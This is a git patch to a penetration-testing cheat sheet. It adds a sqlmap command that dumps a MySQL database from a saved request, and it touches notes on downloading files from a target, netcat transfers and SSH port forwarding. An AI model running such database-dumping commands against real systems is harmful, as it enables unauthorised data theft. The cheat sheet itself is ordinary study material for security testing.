From 7d2f42704c54482bd79df3fb3407c9256b9dfb40 Mon Sep 17 00:00:00 2001 From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Thu, 5 Nov 2020 12:30:11 -0500 Subject: [PATCH] Update Cheat Sheet.md --- Cheat Sheet.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/Cheat Sheet.md b/Cheat Sheet.md index 62bd80a..bbb54c0 100644 --- a/Cheat Sheet.md +++ b/Cheat Sheet.md @@ -54,7 +54,7 @@ python3 -m http.server [port] `By default will listen on 8000`
### Downloading Files -wget http://:port/ +`wget http://:port/` ### Netcat to download files from target @@ -81,6 +81,9 @@ $ kill %1 ### SSH Port Forwarding `ssh -L :localhost: @` +### SQL Map +`sqlmap -r request.txt --dbms=mysql --dump` + # Windows ### Adding User